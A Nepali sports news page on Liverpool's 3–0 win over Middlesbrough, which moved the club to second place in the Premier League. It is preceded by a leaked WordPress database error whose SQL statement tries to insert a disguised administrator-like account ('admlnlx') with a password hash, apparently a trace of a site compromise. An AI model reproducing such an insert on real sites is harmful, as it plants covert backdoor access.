WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B8nkWnKxWQDVBJac5qSItkRJJhV8Nr/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 08:47:24', '', 'admlnlx', 'admlnlx')
काठमाडौं, मंसिर ३०–
आर्सनललाई पछि पार्दै इंग्लिस प्रिमियर लिगमा लिभरपुल दोस्रो स्थानमा उक्लिएको छ। लिग अन्तर्गत गएराति भएको खेलमा मिडल्सबर्गलाई ३–० ले हराउँदै लिभरपुल दोस्रो स्थानमा उक्लिएको हो।
लिभरपुलको जितमा एडम लालनले दुई तथा डिभोक ओरिजीले एक गोल गरे।
जितपछि लिभरपुलको १६ खेलबाट ३४ अंक भएको छ । समान ३४ अंक नै भएपनि आर्सनल गोल अन्तरका आधारमा तेस्रो स्थानमा झरेको छ ।